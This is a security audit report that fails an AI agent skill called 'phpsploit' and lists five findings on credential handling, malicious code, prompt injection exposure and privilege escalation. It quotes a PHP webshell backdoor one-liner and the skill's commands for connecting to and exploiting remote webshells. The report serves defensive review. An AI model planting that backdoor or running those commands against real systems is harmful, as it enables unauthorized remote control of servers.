phpsploit
Fail
Audited by Snyk on Apr 16, 2026
Risk Level: CRITICAL
Full Analysis
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). The skill explicitly uses and shows a PASSKEY value in commands (e.g., "set PASSKEY MySecret") and expects the agent to emit commands or configuration containing that secret verbatim, which requires the LLM to handle/output secret values directly.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This content describes a clear post‑exploitation toolkit: a stealth PHP webshell backdoor (eval(base64_decode($_SERVER['HTTP_X_PAYLOAD']))), HTTP-header tunneling, file upload/download, remote command execution, plugin-based privilege escalation, and obfuscation — all indicative of intentional malicious access, remote control, and data exfiltration capabilities.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly directs the agent to connect to arbitrary remote webshell URLs (e.g., "set TARGET http://target.com/shell.php" and "exploit"), meaning the agent will fetch and interpret untrusted third-party web content from arbitrary public sites as part of its workflow.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill explicitly requires a runtime webshell URL (e.g., http://target.com/shell.php) set via "set TARGET" and connects to it with "exploit", which the framework uses to execute remote code on the target, so this external URL is a required runtime dependency that enables remote code execution.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs uploading and running a PHP webshell, executing arbitrary OS commands on the target, and even loading a "sudo-bypass" escalation plugin—behavior that clearly facilitates bypassing security mechanisms and post-exploitation state changes.
Issues (5)
W007
HIGHInsecure credential handling detected in skill instructions.
E006
CRITICALMalicious code pattern detected in skill scripts.
W011
MEDIUMThird-party content exposure detected (indirect prompt injection risk).
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
W013
MEDIUMAttempt to modify system services in skill instructions.
Audit Metadata